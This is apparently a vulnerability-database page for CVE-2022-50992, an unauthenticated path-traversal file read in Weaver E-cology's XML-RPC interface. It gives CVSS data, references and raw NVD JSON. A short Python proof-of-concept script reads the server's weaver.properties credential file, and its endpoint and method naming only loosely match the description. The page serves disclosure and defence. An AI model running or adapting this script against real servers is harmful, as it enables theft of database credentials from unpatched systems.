CVE-2022-50992

Description

Weaver (Fanwei) E-cology 9.5 versions prior to 10.52 contain an arbitrary file read vulnerability in the XmlRpcServlet interface at the XML-RPC endpoint that allows unauthenticated remote attackers to read arbitrary files by supplying file paths to the WorkflowService.getAttachment and WorkflowService.LoadTemplateProp methods. Attackers can exploit these methods without authentication to retrieve sensitive files including system configuration files and database credentials from the server. Exploitation evidence was first observed by the Shadowserver Foundation on 2022-12-14 (UTC).

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Weaver E-cology < 10.52

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import xmlrpc.client

# Target URL (replace with actual vulnerable host)
target_url = "http://target-ip/services/WorkflowService"

try:
    # Create an XML-RPC client proxy
    proxy = xmlrpc.client.ServerProxy(target_url)

    # Define the file path to read using path traversal
    # Example: Reading the database configuration file
    file_path = "../../WEB-INF/prop/weaver.properties"

    print(f"[*] Attempting to read: {file_path}")

    # Exploit the vulnerable getAttachment method
    # This method does not check authentication or path validity
    content = proxy.getAttachment(file_path)

    print("[+] Exploit successful! File content:")
    print(content)

except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50992
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50992
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50992/
[4] VulDB https://vuldb.com/cve/CVE-2022-50992
[5] https://blog.csdn.net/qq_36618918/article/details/135104295
[6] https://blog.csdn.net/xiayu729100940/article/details/135205082
[7] https://www.cnvd.org.cn/flaw/show/CNVD-2022-43245
[8] https://www.vulncheck.com/advisories/weaver-e-cology-unauthenticated-arbitrary-file-read-via-xmlrpcservlet
[9] https://www.weaver.com.cn/cs/ecology_full_log.html
[10] https://www.weaver.com.cn/cs/securityDownload.html#

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50992", "sourceIdentifier": "[email protected]", "published": "2026-04-30T17:16:24.633", "lastModified": "2026-04-30T17:19:57.853", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Weaver (Fanwei) E-cology 9.5 versions prior to 10.52 contain an arbitrary file read vulnerability in the XmlRpcServlet interface at the XML-RPC endpoint that allows unauthenticated remote attackers to read arbitrary files by supplying file paths to the WorkflowService.getAttachment and WorkflowService.LoadTemplateProp methods. Attackers can exploit these methods without authentication to retrieve sensitive files including system configuration files and database credentials from the server. Exploitation evidence was first observed by the Shadowserver Foundation on 2022-12-14 (UTC)."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://blog.csdn.net/qq_36618918/article/details/135104295", "source": "[email protected]"}, {"url": "https://blog.csdn.net/xiayu729100940/article/details/135205082", "source": "[email protected]"}, {"url": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-43245", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/weaver-e-cology-unauthenticated-arbitrary-file-read-via-xmlrpcservlet", "source": "[email protected]"}, {"url": "https://www.weaver.com.cn/cs/ecology_full_log.html", "source": "[email protected]"}, {"url": "https://www.weaver.com.cn/cs/securityDownload.html#", "source": "[email protected]"}]}}